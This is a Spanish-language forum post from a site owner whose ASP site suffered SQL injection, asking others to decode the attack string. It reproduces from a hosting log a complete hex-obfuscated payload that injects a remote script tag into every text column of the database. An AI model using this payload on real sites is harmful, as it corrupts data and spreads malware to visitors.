Hola gente, como les va miren hasta el momento y como lo vengo manejando yo esto se produce debido a inyecciones SQL, lo primero y principal además de asignar permisos a las tablas es también hacer una correcta validación de parámetro que se pasan, acá le dejos una pagina por si no la vieron que tiene muchos tips sobre inyecciones SQL, según un log del hosting esto fue lo que insertaron por querystring

ver.asp?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S =CAST(0x4445434C4152452040542056415243484152283235 35292C404320564152434841522832353529204445434C4152 45205461626C655F437572736F7220435552534F5220464F52 2053454C45435420612E6E616D652C622E6E616D652046524F 4D207379736F626A6563747320612C737973636F6C756D6E73 206220574845524520612E69643D622E696420414E4420612E 78747970653D27752720414E442028622E78747970653D3939 204F5220622E78747970653D3335204F5220622E7874797065 3D323331204F5220622E78747970653D31363729204F50454E 205461626C655F437572736F72204645544348204E45585420 46524F4D205461626C655F437572736F7220494E544F204054 2C4043205748494C4528404046455443485F5354415455533D 302920424547494E20455845432827555044415445205B272B 40542B275D20534554205B272B40432B275D3D525452494D28 434F4E5645525428564152434841522834303030292C5B272B 40432B275D29292B27273C736372697074207372633D687474 703A2F2F7777772E73736C6E657437322E636F6D2F622E6A73 3E3C2F7363726970743E27272729204645544348204E455854 2046524F4D205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F43757273 6F72204445414C4C4F43415445205461626C655F437572736F 7220%20AS%20VARCHAR(4000));EXEC(@S);--

Si alguien pude o saber como decodificar eso se los voy a agradecer por que la verdad que no se que hizo, si creo un procedimiento o que, bueno gente cualquier info. que descubra la sigo compartiendo aquí, saludos